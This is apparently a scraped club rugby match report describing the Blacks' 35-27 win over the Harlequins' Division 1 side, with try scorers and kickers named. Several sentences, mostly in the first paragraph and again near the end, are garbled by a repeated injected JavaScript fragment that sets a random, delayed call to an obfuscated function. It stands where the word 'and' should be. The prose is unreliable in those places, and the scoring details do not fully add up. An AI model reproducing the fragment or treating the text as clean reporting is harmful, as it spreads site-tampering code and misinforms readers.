Blacks would go on to score 12 more tries in the match, 8 of them converted. Leading scorer for the match was Adam Armstrong with a try andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and 6 conversions for 17 points in only one half of play. Patrick Medina’s 16 points on two tries andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and three conversions was second, followed by evergreen hooker, Chris Cronn, andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and #8, Rafael Lopez-Segovia with two tries apiece. The Harlequins’ Division 1 side came out hungryandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and immediately had the Blacks on their heels. A series of well-constructed phases resulted in an unconverted try in the corner near the 15thminute. The Blacks regathered andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and struck back with a corner try of their own by Antonio Winn, this one converted by Stephen Jones. The score became knotted at 10-10 with another unconverted try by the Quinsandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and a penalty kick slotted by Jones. The Quins added a penalty of their own, only to be matched by an astute drop goal by Jones, noticing that advantage was being played deep within the Quins half thanks to several line breaks. The halftime score stood at 13-13.
Scoring was more abundant in the second half, with both defenses wearing down with the highly physical play. A Quins converted try in the 48th minute was answered by Pat Sullivan’s score, however unsuccessfully converted. The Blacks seemed to gain momentum after finishing a long possession with a try by Adam Armstrong. However the Quins fought back through a series of deft offloads that led to an open dot-down under the posts. They again pulled ahead 27-23. The last 10 minutes belonged to the Blacks, as a mauling lineout led to an easy line breakandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and score by Levi Kereti, successfully converted again by Jones. With ball in handom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and once again, the Blacks put the punctuation mark on the game with another score by Adam Armstrong in the corner, the missed conversion being of no consequence. Blacks pull out a gutty victory, 35-27.
